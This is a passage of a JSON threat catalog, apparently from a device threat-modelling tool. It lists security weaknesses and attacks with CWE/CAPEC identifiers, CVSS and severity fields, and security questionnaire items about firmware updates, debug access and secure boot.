validation","Description":"","OriginTypes":[1],"Weakness":{"CWEID":20},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"ef144ae1-4c70-400e-8222-b8a7dd3bf3e9","Name":"Cleartext storage of sensitive information ","Description":"","OriginTypes":[1],"Weakness":{"CWEID":312},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Severity":3},{"ID":"e851a284-6b41-41c9-9efd-dc8b01f788da","Name":"Cleartext storage on physical storage","Description":"","OriginTypes":[1],"Weakness":{"CWEID":313},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"bb7358c1-e5b6-424f-962d-daab17345b63","Name":"Cleartext transmission of sensitive data","Description":"","OriginTypes":[1],"Weakness":{"CWEID":319},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","8a3d81d9-3317-4e5d-88fe-a0e0592295fe"],"Severity":3},{"ID":"001ba17c-0400-4369-912e-0ceda3ccd227","Name":"Improper message integrity verification","Description":"","OriginTypes":[1],"Weakness":{"CWEID":924},"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":2},{"ID":"1a511f9e-5d1b-47b9-9071-4d39407cc75c","Name":"Improper neutralization in SQL command","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":89},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":66,"CVSS":{}},"Severity":3},{"ID":"f0ef09ed-0cde-4b12-beb6-f1640132f3e6","Name":"Plaintext password storage","Description":"","OriginTypes":[1],"Weakness":{"CWEID":256},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"0e3c0e3e-1587-46f8-93ea-e9091dff5958","Name":"Use of hash w/o salt","Description":"","OriginTypes":[1,2],"Weakness":{"CWEID":759},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":55,"CVSS":{}},"Severity":2},{"ID":"d46f6e31-ae41-4d6e-93fc-0e6c3bbb295d","Name":"Missing authentication for critical function","Description":"","OriginTypes":[1],"Weakness":{"CWEID":306},"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":3},{"ID":"be14adbc-19a7-48c8-8f13-2566559e63e2","Name":"Malicious code implanted during programming","Description":"","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["P"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"AttackTechnique":{"CAPECID":672,"CVSS":{}},"Severity":2},{"ID":"21c6b5ef-82c7-41e5-bb07-de93445b2156","Name":"Replacement with malicious peripheral","Description":"Alteration of PCB (processor, data store, interface controller, any IC) to bypass restrictions, access data, etc.","OriginTypes":[2],"Weakness":{},"ThreatIntroduced":["P","D"],"ThreatExploited":["P","D"],"threatCategorieIDs":["c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":439,"CVSS":{}},"Severity":3},{"ID":"90a4e8f3-c750-47c4-97fd-fa9e25b9b599","Name":"Factory oversupply","Description":"The contracted manufacturer produces more parts than specified and keeps/resells the surplus.","OriginTypes":[],"Weakness":{},"ThreatIntroduced":["P"],"ThreatExploited":["P"],"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"Severity":2},{"ID":"a912b48a-3b4d-44ab-b8f3-28000ca945c4","Name":"Provisioning data cloning","Description":"The contracted manufacturer clones data that was initially inserted (e.g., key material).","OriginTypes":[],"ThreatIntroduced":["P"],"ThreatExploited":["P","D"],"threatCategorieIDs":[],"Severity":2},{"ID":"97b5a1d4-be82-4485-82f6-e4532795a20b","Name":"Algorithm downgrade","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":757},"Severity":3},{"ID":"a20d6e53-4426-4700-a04f-a4018bc7bfce","Name":"Weak block cipher mode","Description":"Deprecated block cipher modes, such as ECB or CBC, do not provide enough security.","OriginTypes":[],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Severity":3},{"ID":"680ceebd-357c-49d6-8bfd-390dc6c51dde","Name":"Nonce reuse","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":323},"Severity":3},{"ID":"c23a62c8-901a-412b-80b8-d2574103b733","Name":"Firmware downgrade","Description":"For practical reasons a downgrade is probably necessary, but security patches should not be reversible (e.g. by using special security version numbers).","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["U"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1328},"Severity":3},{"ID":"a0729a41-bcc9-43d8-9c86-bfb26c64e93c","Name":"Inadequate encryption strength","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":326},"Severity":2},{"ID":"9538abd8-f79c-4097-b2dd-716e50a125ee","Name":"Permissive status display","Description":"Details about status, configuration, software version, metadata, logging data, operation status, etc. are shown to unauthorized users","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":200},"Severity":2},{"ID":"b9436449-7896-4be6-89f8-a19e1c8d014f","Name":"Missing password field masking","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":549},"AttackTechnique":{"CAPECID":508,"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"R","S":"U","C":"H","I":"L","A":"L","Score":6.6}},"Severity":2},{"ID":"5435aa9a-ad52-470f-8fa5-81a4f926b6a6","Name":"Weak password requirements","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":521},"Severity":3},{"ID":"723dfb40-4ceb-4232-bda5-73bcb3c76ac0","Name":"Hard-coded credentials","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":798},"Severity":4},{"ID":"5e7fd04c-0e14-4c76-800d-f581bcf7c7f6","Name":"Default password","Description":"A common vulnerability are default credentials that can be found in the manual.","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CAPECID":560,"CVSS":{"AV":"A","A":"H","C":"H","I":"L","Score":8.3}},"Weakness":{"CWEID":557},"Severity":3},{"ID":"63dfaefa-c8a8-4725-b6d6-2efff7306639","Name":"Single-factor authentication","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":308},"Severity":2},{"ID":"296e95fe-e06d-4ae3-be84-da98df4a122c","Name":"Missing authentication attempt restriction","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":307},"AttackTechnique":{"CAPECID":49,"CVSS":{}},"Severity":2},{"ID":"bf289171-82c3-431a-b3f1-28d17e5a6546","Name":"Insufficient session expiration","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":613},"Severity":2},{"ID":"2f483201-0209-4320-ba2e-2d692274aab5","Name":"Password recovery mechanism","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":638},"Severity":2},{"ID":"4ee3fc8a-87a5-4fdf-868f-fb35cd12dc91","Name":"Client-side password hashing","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":836},"Severity":3},{"ID":"05e04798-41ce-4919-a92b-264f7e985de2","Name":"Password hash with predictable salt","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":760},"Severity":1},{"ID":"e6c3d6f5-f4c7-48b7-b516-2092c3557c81","Name":"IC reverse engineering","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596","ddf75d3c-ac5a-4ca2-8268-a4f7b40add7d"],"Weakness":{"CWEID":1278},"Severity":2},{"ID":"1447713d-9ad6-454e-81d8-c9f4ef34c72b","Name":"Battery draining attack ","Description":"Denial of sleep, flooding attacks","OriginTypes":[2],"ThreatIntroduced":["C"],"ThreatExploited":["O"],"threatCategorieIDs":["9e715340-1a69-47df-864a-7c3b5a9a678e","b869918c-0b47-45c3-8fab-0b698043aa66","08d8fbba-5de4-4538-8674-43e214c3ebad","f2ba26f4-b2da-49a8-aba2-14e42a746d6a"],"AttackTechnique":{"CAPECID":125,"CVSS":{}},"Severity":2},{"ID":"195d942e-02f8-49ad-873f-299f4b4ad4ec","Name":"HID/Keyboard spoofing","Description":"An USB stick imitates a keyboard to inject commands. The stick may be a present or found in the parking lot.","OriginTypes":[2],"ThreatIntroduced":["C"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596","b1ff0675-f9b7-4ffb-bdd5-f621c6580d9a"],"AttackTechnique":{"CAPECID":null,"CVSS":{"AV":"L","AC":"L","PR":"L","UI":"R","C":"H","I":"H","A":"H"}},"Severity":3},{"ID":"cf948333-b659-40ff-b93f-d4bdc8c980d1","Name":"Phishing","Description":"","OriginTypes":[2],"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":98},"Severity":3},{"ID":"915f674e-926b-4bd9-94cb-ee8b4637bc80","Name":"USB Killer","Description":"A device that looks similar to an USB flash drive creates high-voltage pulses to damage/destroy the hardware. This type of attack is also possible at other interfaces than USB as there are publicly available adapter for HDMI and Thunderbolt, for example.","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","88d19822-b1b0-469f-ae00-1bc600ccaa1d","644f8521-6b49-41bc-86df-4064b89fb881","96bdc11d-dbb0-4785-8a5c-373e2c492eb0"],"AttackTechnique":{"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"R","S":"U","C":"N","I":"L","A":"H","Score":6.1}},"Severity":3},{"ID":"f5949698-47d4-48ee-a116-2d212695c41f","Name":"Port scanning","Description":"","OriginTypes":[2],"ThreatIntroduced":[],"ThreatExploited":["O"],"threatCategorieIDs":[],"AttackTechnique":{"CVSS":{"AV":"A","AC":"L","PR":"N","UI":"N","S":"U","C":"L","I":"N","A":"N","Score":4.3},"CAPECID":300},"Severity":1},{"ID":"b8835cb9-3c77-496e-ac2d-2ed6fa7f2d78","Name":"Protocol manipulation","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"AttackTechnique":{"CVSS":{},"CAPECID":272},"Severity":2},{"ID":"573881b4-ceb6-4d6a-a5c3-9c0e6c5a3b3c","Name":"Actuator command injection","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":[],"AttackTechnique":{"CVSS":{}},"Severity":3},{"ID":"a76b8768-9d68-4074-b5e1-0f9abc61bcda","Name":"Sensor data manipulation","Description":"","OriginTypes":[2],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f2ba26f4-b2da-49a8-aba2-14e42a746d6a","b7935cfe-6a41-45e4-8778-f0fbb1e4018b"],"AttackTechnique":{"CVSS":{}},"Severity":3},{"ID":"30cf5142-2339-4130-8a6e-2b05869e6df2","Name":"Physical theft","Description":"","OriginTypes":[2],"ThreatIntroduced":["O"],"ThreatExploited":["O"],"threatCategorieIDs":["a6a57921-7fcb-4f54-b0f5-bac0a0f74163","6b8c08cb-3f02-413a-96b4-179bb1f67997"],"AttackTechnique":{"CVSS":{"AV":"L","AC":"L","PR":"N","UI":"N","S":"U","C":"N","I":"N","A":"H","Score":6.2},"CAPECID":507},"Severity":2},{"ID":"c7787e71-5c70-462c-9558-ce20e7cfdfe8","Name":"Selective forwarding","Description":"Selective forwarding of messages/network packets ","OriginTypes":[2],"ThreatIntroduced":[],"ThreatExploited":["O"],"threatCategorieIDs":["f7639a0c-e85b-4947-bbec-2ac4a0911827","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f","f2b91aaf-7d9f-4baf-8713-13d7625174d9"],"AttackTechnique":{"CVSS":{}},"Severity":2},{"ID":"184cd5e5-2517-4d7f-a81a-c411942d3601","Name":"Unpublished interfaces","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"C":"H","Score":9.8,"I":"H","A":"H"},"CAPECID":36},"Weakness":{"CWEID":1242},"Severity":3},{"ID":"83d23b79-71c5-488e-adb2-dd0f76d70f44","Name":"Firmware modification","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["U"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","b869918c-0b47-45c3-8fab-0b698043aa66","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"A":"H","Score":9.8,"I":"H","C":"H"},"CAPECID":165},"Severity":4},{"ID":"afd4bceb-31b0-41cd-9eae-02d2eba6b41c","Name":"Insufficient logging","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c17cbe5c-3210-42fc-be1e-05f1f915865b"],"Weakness":{"CWEID":778},"Severity":2},{"ID":"f170308a-c188-4ae0-bcef-d04af1e429b3","Name":"Mutable Root of Trust","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1326},"Severity":3},{"ID":"cf63f187-4353-4bf8-bc37-a7392c6d91bf","Name":"TOCTOU attack","Description":"","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{"A":"H","Score":9.8,"I":"H","C":"H"},"CAPECID":29},"Weakness":{"CWEID":367},"Severity":3},{"ID":"ffd6083b-7183-472c-b250-15b0de223735","Name":"Password sharing","Description":"Users/Employees share the password, e.g. using a note next to the device.","OriginTypes":[],"ThreatIntroduced":["S","O"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"Severity":2},{"ID":"66c5f951-6286-4b22-a71a-ee4d6232f689","Name":"Incorrect default permissions","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec"],"Weakness":{"CWEID":276}},{"ID":"eab94c5b-f7e8-4b2a-9ffb-658aefc8f0d0","Name":"Insufficiently protected credentials","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":522},"Severity":3},{"ID":"06c24920-2ce3-49ca-8134-9fa81fb2cdef","Name":"Identity spoofing","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","4f5e6bf4-c9c4-4ea6-9b0e-5c861570e6ec","c46b7c74-5979-409d-8ceb-631b8833c596","3bbe354c-317a-4f76-bdbb-75543b5d5aa4"],"AttackTechnique":{"CVSS":{},"CAPECID":151},"Severity":2},{"ID":"71f761e4-8149-4a88-92fd-35f9d99cc0ef","Name":"Logging sensitive information","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O","M"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":532},"Severity":3},{"ID":"6bf04ffa-1f83-4637-a866-d02ff10d752b","Name":"Sensitive information exposed","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":200},"Severity":3},{"ID":"e36eff83-1863-4026-bffe-966a9a104331","Name":"Uncaught exception","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["b869918c-0b47-45c3-8fab-0b698043aa66","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf"],"Weakness":{"CWEID":248},"Severity":2},{"ID":"6509fe5f-7e27-40ec-bd08-97e29c67f8c1","Name":"Use of expired certificate","Description":"","OriginTypes":[1],"ThreatIntroduced":["I","O"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":324},"Severity":2},{"ID":"ed84da5f-3181-4be1-bef4-d911077b1910","Name":"Improper check of certificate revocation","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":299},"Severity":2},{"ID":"b26fc3e4-7a38-4f00-acdb-ec78246d0b25","Name":"Improper certificate chain verification","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596","8a3d81d9-3317-4e5d-88fe-a0e0592295fe","d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f7639a0c-e85b-4947-bbec-2ac4a0911827"],"Weakness":{"CWEID":296},"Severity":2},{"ID":"3162421f-ca5b-400d-bbe8-58a510be9abf","Name":"Missing authorization check","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":862},"Severity":3},{"ID":"4e007b60-94e7-4df3-b3bd-109eb8627da2","Name":"Replay attack","Description":"Replaying a capture network package","OriginTypes":[1],"ThreatIntroduced":["I","C"],"ThreatExploited":["O"],"threatCategorieIDs":["d0bcd70c-fbad-4a16-a606-8b0682ae7afe","f3fe9ca9-4c34-40fc-a270-3e6252d01e6f"],"Weakness":{"CWEID":294},"Severity":2},{"ID":"b48781b2-24a2-481b-b7c1-3390dbeeb973","Name":"Cross Site Scripting (XSS)","Description":"See CWE-79 and CAPEC-63","OriginTypes":[1,2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","c0bd6e2f-9784-4c11-9aee-115a966e0a4d","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":79},"AttackTechnique":{"CVSS":{},"CAPECID":63},"Severity":4},{"ID":"04d5f07e-2482-451b-9e24-94cb650da53b","Name":"Use of broken/risky cryptographic algorithm","Description":"","OriginTypes":[1],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c17cbe5c-3210-42fc-be1e-05f1f915865b"],"Weakness":{"CWEID":327},"Severity":3},{"ID":"7742f998-ab1e-4f64-8ac6-12b3f97b936a","Name":"Unawareness","Description":"The affected subject is not aware of the collection, processing, storage, or sharing of the subject\'s data.","OriginTypes":[],"ThreatIntroduced":["C","I"],"ThreatExploited":["O"],"threatCategorieIDs":["6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","aead4d1d-0f64-42b4-a512-cbbc979af3ca","7bbfe5d3-8a91-4210-99ab-79f670715e61"]},{"ID":"0217b20a-5e3a-4244-8dce-819e28050a47","Name":"Credential stuffing","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":600},"Severity":3},{"ID":"1909127e-50bd-4892-8b1f-1a2123a4fa61","Name":"Password spraying","Description":"","OriginTypes":[2],"ThreatIntroduced":["I"],"ThreatExploited":["O"],"threatCategorieIDs":["c46b7c74-5979-409d-8ceb-631b8833c596"],"AttackTechnique":{"CVSS":{},"CAPECID":565},"Severity":3},{"ID":"e060675a-41d0-4c4d-9e16-311bb4adec7b","Name":"Insecure default settings","Description":"","OriginTypes":[1],"ThreatIntroduced":["C","I","S"],"ThreatExploited":["O"],"threatCategorieIDs":["f19e41bd-9fd9-4046-a195-28d441207fa0","6382e7ee-efbd-40c3-8064-1a1fdd87cdaf","c46b7c74-5979-409d-8ceb-631b8833c596"],"Weakness":{"CWEID":1188},"Severity":2}],"threatQuestions":[{"ID":"5e4b4f24-6c61-4f68-ad6f-4bbce2240a36","Name":"Updatable","Description":"","OptionType":1,"componentTypeID":"ca502567-bafc-40f9-a5e4-8ce94780c3f6","Question":"Does the device provide the ability to update or patch the firmware?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"367b80cd-1b41-483b-a157-b143714b8af7"},{"ID":"04f0bcc3-540b-462a-985b-e327acaed25d","Name":"Risky cryptographic algorithm ","Description":"No use of custom encryption schemes, deprecated algorithms (DES, MD5, SHA1, etc.)","OptionType":1,"componentTypeID":"838f741c-120e-4b73-951a-d55a11d36ca4","Question":"Does the device use only secure, standardized, and approved cryptographic algorithms?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"783c742d-ebbf-4a58-b8c9-bdc0faeff57d"},{"ID":"f56819e0-d966-4cd7-a514-8c3f944e176c","Name":"Improper access control","Description":"","OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"Does the device implement and correctly perform access control on physical debug/test interfaces to check users\' authorization? ","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"f40ce61a-c823-4ca7-ab51-a70dbd9718a6"},{"ID":"bf172d28-de23-4b6f-b308-1d919e9f35a1","Name":"Internal assets exposed","Description":"","OptionType":1,"componentTypeID":"2d746c06-a57d-41af-9712-f9d8059425eb","Question":"[Has access control] Does the device, supporting multiple debug access levels, assign the right access level to internal assets?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":false},"general.No":{"Active":true,"Value":true},"general.N/A":{"Active":false}},"propertyID":"517b62dd-eea7-426e-82c6-2c458eed0aaf"},{"ID":"d0c8f335-4df1-4719-ad49-ac60573cc59d","Name":"Hardware Feature Restriction","Description":"Hardware functionality can be used to modify the memory or to observe physical side channels.","OptionType":1,"componentTypeID":"6c83ccbc-ffbd-4bd6-b207-07386e3393c5","Question":"Does the device restrict access to software-controllable device functionality (e.g. power and clock management)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"4d88ce07-2a06-4ae3-942a-46eb25ccdd9b"},{"ID":"835439f8-ce55-4a20-a448-4c2f62097869","Name":"Address Region Overlap","Description":"","OptionType":1,"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Question":"Does the device allow overlapping of address regions (possibly leading to bypassing of memory protection)?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"ca6a9224-153b-4c06-8c1b-4ea3333c8e92"},{"ID":"9736c676-6bb8-4fb9-beae-9213ac40d95b","Name":"State Transition","Description":"E.g., an uncleared SRAM can expose information after a software reset.","OptionType":1,"componentTypeID":"ea189855-6883-489f-a3d0-77d4ac51a6ef","Question":"Does the device clear sensitive information when a power or debug state transition is performed?","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"propertyID":"16ab50f4-dd94-43dd-8480-37cae5c61043"},{"ID":"0e873bd5-6e22-4a7d-82dd-98851bd9264e","Name":"Missing secure boot","Description":"","ChangesPerOption":{"general.Yes":{"Active":true,"Value":true},"general.No":{"Active":true,"Value":false},"general.N/A":{"Active":false}},"OptionType":1,"componentTypeID":"75752ec0-7fa9-41a9-a06a-edcf890ca569","Question":"Does the device implement a secure 